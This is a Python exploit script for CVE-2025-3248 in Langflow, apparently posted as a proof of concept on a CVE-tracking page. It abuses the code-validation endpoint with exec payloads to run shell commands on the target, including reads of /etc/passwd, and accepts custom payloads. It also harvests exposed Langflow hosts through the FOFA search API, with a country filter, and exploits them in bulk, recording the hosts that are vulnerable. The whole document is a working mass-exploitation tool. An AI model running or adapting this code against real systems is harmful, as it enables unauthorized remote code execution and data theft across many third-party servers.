4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / main.py PY
import argparse
import requests
import json
import sys
import time
import base64
from urllib.parse import urlparse, urljoin
from concurrent.futures import ThreadPoolExecutor
from colorama import init, Fore, Style
import os
from dotenv import load_dotenv
import urllib3
import csv
from datetime import datetime
from src.scanner.scanner import LangflowScanner
from src.scanner.fofa import FofaAPI
from src.utils.display import print_banner, print_section, create_progress_bar

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Initialize colorama
init(autoreset=True)

class LangflowScanner:
    def __init__(self, url, timeout=10, verify_ssl=False):
        self.url = url.rstrip('/')
        self.timeout = timeout
        self.verify_ssl = verify_ssl
        self.session = requests.Session()
        self.session.verify = False  
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
            'Content-Type': 'application/json',
            'Accept': 'application/json',
            'X-Requested-With': 'XMLHttpRequest'
        })
        
    def check_vulnerability(self):
        """Check if target is vulnerable to Langflow vulnerability"""
        try:
            validate_url = urljoin(self.url, '/api/v1/validate/code')
            # 使用exec函数执行代码
            payload = {
                "code": """
def test(cd=exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')):
    pass
"""
            }
            
            print(f"{Fore.YELLOW}[*] Testing endpoint: {validate_url}")
            response = self.session.post(
                validate_url, 
                json=payload, 
                timeout=self.timeout
            )
            
            print(f"{Fore.YELLOW}[*] Response status: {response.status_code}")
            print(f"{Fore.YELLOW}[*] Response headers: {dict(response.headers)}")
            print(f"{Fore.YELLOW}[*] Response body: {response.text}")
            
            if response.status_code == 200:
                return True, "Target might be vulnerable to Langflow vulnerability (CVE-2025-3248)"
            else:
                return False, "Target might not be vulnerable to Langflow vulnerability"
                
        except requests.exceptions.RequestException as e:
            return False, f"Request error: {str(e)}"
    
    def exploit(self, payload):
        """Exploit the vulnerability to execute code"""
        try:
            validate_url = urljoin(self.url, '/api/v1/validate/code')
            
            # 如果payload是字符串,转换为完整的请求格式
            if isinstance(payload, str):
                payload = {
                    "code": payload
                }
            
            print(f"{Fore.YELLOW}[*] Sending payload to: {validate_url}")
            response = self.session.post(
                validate_url, 
                json=payload,
                timeout=self.timeout
            )
            
            print(f"{Fore.YELLOW}[*] Response status: {response.status_code}")
            print(f"{Fore.YELLOW}[*] Response headers: {dict(response.headers)}")
            print(f"{Fore.YELLOW}[*] Response body: {response.text}")
            
            if response.status_code == 200:
                return True, response.text
            else:
                return False, f"Exploitation failed, status code: {response.status_code}"
                
        except requests.exceptions.RequestException as e:
            return False, f"Request error: {str(e)}"
    
    def get_system_info(self):
        """Get system information"""
        print(f"\n{Fore.CYAN}╔══════════════════════════════════════════════════════════════╗")
        print(f"{Fore.CYAN}║                     System Information                        ║")
        print(f"{Fore.CYAN}╚══════════════════════════════════════════════════════════════╝\n")

        # 获取系统信息 (uname -a)
        payload = {
            "code": """
def get_system(cd=exec('raise Exception(__import__("subprocess").check_output("uname -a", shell=True))')):
    pass
"""
        }
        success, result = self.exploit(payload)
        if success:
            try:
                info = json.loads(result)
                if "function" in info and "errors" in info["function"]:
                    error_msg = info["function"]["errors"][0]
                    if isinstance(error_msg, str) and error_msg.startswith("b'"):
                        content = error_msg[2:-1].encode().decode('unicode_escape').strip()
                        print(f"{Fore.GREEN}[+] System Details:")
                        print(f"{Fore.YELLOW}    {content}\n")
            except Exception as e:
                print(f"{Fore.RED}[!] Failed to get system information: {str(e)}")

        # 获取/etc/passwd内容
        print(f"{Fore.CYAN}╔══════════════════════════════════════════════════════════════╗")
        print(f"{Fore.CYAN}║                     User Information                         ║")
        print(f"{Fore.CYAN}╚══════════════════════════════════════════════════════════════╝\n")
        
        payload = {
            "code": """
def get_passwd(cd=exec('raise Exception(__import__("subprocess").check_output("cat /etc/passwd", shell=True))')):
    pass
"""
        }
        success, result = self.exploit(payload)
        if success:
            try:
                info = json.loads(result)
                if "function" in info and "errors" in info["function"]:
                    error_msg = info["function"]["errors"][0]
                    if isinstance(error_msg, str) and error_msg.startswith("b'"):
                        content = error_msg[2:-1].encode().decode('unicode_escape').strip()
                        print(f"{Fore.GREEN}[+] User Accounts:")
                        # 格式化显示用户信息
                        for line in content.split('\n'):
                            if line.strip():
                                user_info = line.split(':')
                                if len(user_info) >= 7:
                                    username, _, uid, gid, comment, home, shell = user_info
                                    print(f"{Fore.YELLOW}    {username:15} UID:{uid:6} GID:{gid:6} Home:{home:20} Shell:{shell}")
                        print()
            except Exception as e:
                print(f"{Fore.RED}[!] Failed to get user information: {str(e)}")
        
        return success, result
    
    def execute_command(self, command):
        """Execute system command"""
        # 使用exec函数执行代码
        payload = {
            "code": f"""
def run_cmd(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')):
    pass
"""
        }
        return self.exploit(payload)

class FofaAPI:
    def __init__(self, email, key):
        self.email = email
        self.key = key
        self.base_url = "https://fofa.info/api/v1"
        
    def search(self, query, size=100, page=1):
        """Search assets using FOFA API"""
        try:
            encoded_query = base64.b64encode(query.encode()).decode()
            params = {
                'email': self.email,
                'key': self.key,
                'qbase64': encoded_query,
                'size': size,
                'page': page,
                'fields': 'host,ip,port,protocol'
            }
            
            print(f"{Fore.YELLOW}[*] Querying FOFA page {page}...")
            response = requests.get(
                f"{self.base_url}/search/all", 
                params=params,
                verify=False,  # 禁用SSL验证
                timeout=10
            )
            data = response.json()
            
            if data.get("error"):
                print(f"{Fore.RED}[!] FOFA API Error: {data.get('errmsg')}")
                return []
            
            results = data.get("results", [])
            if not results:
                print(f"{Fore.YELLOW}[*] No results found on page {page}")
                return []
            
            # Process and format URLs
            formatted_targets = []
            for host, ip, port, protocol in results:
                # Fix URL construction logic
                if ":" in host:  # If host already contains port
                    url = f"{protocol}://{host}"
                else:
                    if port in ["80", "443"]:
                        url = f"{protocol}://{host}"
                    else:
                        url = f"{protocol}://{host}:{port}"
                formatted_targets.append((url, ip, port, protocol))
            
            print(f"{Fore.GREEN}[+] Retrieved {len(formatted_targets)} results from page {page}")
            return formatted_targets
                
        except Exception as e:
            print(f"{Fore.RED}[ERROR] FOFA API error: {str(e)}")
            return []

    def search_all_pages(self, query, max_pages=5, page_size=100, country=None):
        """Search all pages up to max_pages"""
        all_targets = []
        
        # 如果指定了国家,添加国家过滤条件
        if country:
            query = f"{query} && country='{country}'"
        
        for page in range(1, max_pages + 1):
            results = self.search(query, page_size, page)
            if not results:
                break
            all_targets.extend(results)
            time.sleep(1)  # 添加延迟以避免API限制
            
        return all_targets

def print_banner():
    """Print tool banner"""
    banner = f"""
{Fore.CYAN}╔══════════════════════════════════════════════════════════════╗
║                    Langflow Vulnerability Scanner            ║
║                CVE-2025-3248 Detection & Exploitation        ║
╚══════════════════════════════════════════════════════════════╝
    """
    print(banner)

def save_to_csv(results, filename=None):
    """Save vulnerable results to CSV file"""
    if not filename:
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        filename = f"langflow_scan_{timestamp}.csv"
    
    # 只保存可利用的目标
    vulnerable_results = [r for r in results if r.get('vulnerable') == 'Yes']
    
    if not vulnerable_results:
        print(f"\n{Fore.YELLOW}[*] No vulnerable targets found, skipping CSV creation")
        return
    
    try:
        with open(filename, 'w', newline='') as f:
            writer = csv.writer(f)
            writer.writerow(['URL', 'System Info', 'Details'])
            for result in vulnerable_results:
                writer.writerow([
                    result['url'],
                    result.get('system_info', 'N/A'),
                    result.get('details', 'N/A')
                ])
        print(f"\n{Fore.GREEN}[+] {len(vulnerable_results)} vulnerable targets saved to: {filename}")
    except Exception as e:
        print(f"{Fore.RED}[!] Failed to save results: {str(e)}")

def scan_target(url, timeout=10, verify=True, output_file=None):
    """Scan single target"""
    scanner = LangflowScanner(url, timeout, verify)
    is_vulnerable, message = scanner.check_vulnerability()
    
    if is_vulnerable:
        print(f"{Fore.GREEN}[+] {url}: {message}")
        success, system_info = scanner.get_system_info()
        return {
            'url': url,
            'system_info': system_info if success else 'Failed to get system info',
            'vulnerable': 'Yes',
            'details': message
        }
    else:
        print(f"{Fore.RED}[-] {url}: {message}")
        return {
            'url': url,
            'system_info': 'N/A',
            'vulnerable': 'No',
            'details': message
        }

def load_fofa_credentials():
    """Load FOFA credentials from .env file"""
    load_dotenv()
    email = os.getenv('FOFA_EMAIL')
    key = os.getenv('FOFA_KEY')
    return email, key

def main():
    parser = argparse.ArgumentParser(
        description="Langflow Vulnerability Scanner (CVE-2025-3248)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Scan single target
  python main.py -t https://target.com

  # Scan with .env FOFA
  python main.py
  
  # Scan with custom payload
  python main.py -t https://target.com -f custom_payload.py
  
  # Scan with FOFA API
  python main.py --fofa-email [email protected] --fofa-key your_api_key
  
  # Scan with FOFA API and save results
  python main.py --fofa-email [email protected] --fofa-key your_api_key -o results.csv
  
  # Scan with country filter
  python main.py --fofa-email [email protected] --fofa-key your_api_key --country US
  
  # Scan with custom query
  python main.py --fofa-email [email protected] --fofa-key your_api_key --fofa-query 'title="Langflow"'
"""
    )
    
    parser.add_argument("-t", "--target", help="Target URL to scan")
    parser.add_argument("--fofa-email", help="FOFA API Email")
    parser.add_argument("--fofa-key", help="FOFA API Key")
    parser.add_argument("--fofa-query", help="FOFA search query", 
                       default='app="LOGSPACE-LangFlow"')
    parser.add_argument("--country", help="Filter results by country code (e.g., CN, US)")
    parser.add_argument("--max-pages", type=int, default=5, help="Maximum number of FOFA pages to retrieve")
    parser.add_argument("--page-size", type=int, default=100, help="Results per page")
    parser.add_argument("--timeout", type=int, default=10, help="Request timeout in seconds")
    parser.add_argument("--no-verify", action="store_true", default=True, help="Disable SSL verification")
    parser.add_argument("--threads", type=int, default=5, help="Number of threads for concurrent scanning")
    parser.add_argument("-f", "--file", help="Custom Python file to use as payload")
    parser.add_argument("-o", "--output", help="Output CSV file name")
    
    args = parser.parse_args()
    print_banner()
    
    if args.target:
        # Single target mode
        if args.file:
            try:
                with open(args.file, 'r') as f:
                    custom_payload = f.read()
                print(f"{Fore.YELLOW}[*] Using custom payload from file: {args.file}")
                scanner = LangflowScanner(args.target, args.timeout, not args.no_verify)
                is_vulnerable, message = scanner.check_vulnerability()
                
                if is_vulnerable:
                    print(f"{Fore.GREEN}[+] {args.target}: {message}")
                    success, result = scanner.exploit(custom_payload)
                    if success:
                        try:
                            info = json.loads(result)
                            if "function" in info and "errors" in info["function"]:
                                error_msg = info["function"]["errors"][0]
                                if isinstance(error_msg, str) and error_msg.startswith("b'"):
                                    content = error_msg[2:-1].encode().decode('unicode_escape')
                                    print(f"{Fore.YELLOW}[*] Retrieved content:")
                                    print(content)
                        except Exception as e:
                            print(f"{Fore.RED}[!] Failed to parse response: {str(e)}")
                            print(f"{Fore.YELLOW}[*] Raw response: {result}")
                    else:
                        print(f"{Fore.RED}[!] Failed to execute custom payload: {result}")
                else:
                    print(f"{Fore.RED}[-] {args.target}: {message}")
            except FileNotFoundError:
                print(f"{Fore.RED}[!] Custom payload file not found: {args.file}")
            except Exception as e:
                print(f"{Fore.RED}[!] Error reading custom payload file: {str(e)}")
        else:
            result = scan_target(args.target, args.timeout, not args.no_verify)
            if args.output:
                save_to_csv([result], args.output)
    else:
        # FOFA mode
        fofa_email = args.fofa_email
        fofa_key = args.fofa_key
        
        # Try to load credentials from .env if not provided
        if not (fofa_email and fofa_key):
            env_email, env_key = load_fofa_credentials()
            fofa_email = fofa_email or env_email
            fofa_key = fofa_key or env_key
        
        if not (fofa_email and fofa_key):
            print(f"{Fore.RED}[!] FOFA credentials not found. Please provide them via arguments or .env file")
            return
            
        fofa = FofaAPI(fofa_email, fofa_key)
        results = []
        
        print(f"{Fore.YELLOW}[*] Searching FOFA for targets...")
        targets = fofa.search_all_pages(
            args.fofa_query,
            args.max_pages,
            args.page_size,
            args.country
        )
        
        if not targets:
            print(f"{Fore.RED}[!] No targets found")
            return
            
        print(f"{Fore.GREEN}[+] Found {len(targets)} targets")
        
        total_targets = len(targets)
        successful_exploits = 0
        failed_scans = 0
        current_target = 0
        
        # 修复 URL 构造逻辑
        for url, ip, port, protocol in targets:
            current_target += 1
            # 移除重复的协议前缀
            url = url.replace('http://http://', 'http://').replace('https://https://', 'https://')
            
            # 清除当前行并显示进度
            print(f"\033[2J\033[H", end='')  # 清屏
            print_banner()
            print(f"{Fore.YELLOW}[*] Current Progress: {current_target}/{total_targets}")
            print(f"{Fore.YELLOW}[*] Scanning: {url}")
            print(f"{Fore.GREEN}[+] Successful Exploits: {successful_exploits}")
            print(f"{Fore.RED}[-] Failed Scans: {failed_scans}")
            if total_targets > 0:
                success_rate = (successful_exploits/total_targets*100)
                print(f"{Fore.YELLOW}[*] Current Success Rate: {success_rate:.2f}%")
            
            try:
                result = scan_target(url, args.timeout, not args.no_verify)
                if result['vulnerable'] == 'Yes':  # 只添加可利用的目标
                    results.append(result)
                    successful_exploits += 1
            except Exception as e:
                print(f"{Fore.RED}[!] Error scanning {url}: {str(e)}")
                failed_scans += 1
                continue
        
        # 显示最终统计信息
        print(f"\n{Fore.CYAN}╔══════════════════════════════════════════════════════════════╗")
        print(f"{Fore.CYAN}║                     Final Statistics                         ║")
        print(f"{Fore.CYAN}╚══════════════════════════════════════════════════════════════╝")
        print(f"\n{Fore.GREEN}[+] Total Targets: {total_targets}")
        print(f"{Fore.GREEN}[+] Successful Exploits: {successful_exploits}")
        print(f"{Fore.RED}[-] Failed Scans: {failed_scans}")
        if total_targets > 0:
            print(f"{Fore.YELLOW}[*] Final Success Rate: {(successful_exploits/total_targets*100):.2f}%")
            
        if results:
            save_to_csv(results, args.output)
        else:
            print(f"\n{Fore.YELLOW}[*] No vulnerable targets found")

if __name__ == "__main__":
    main()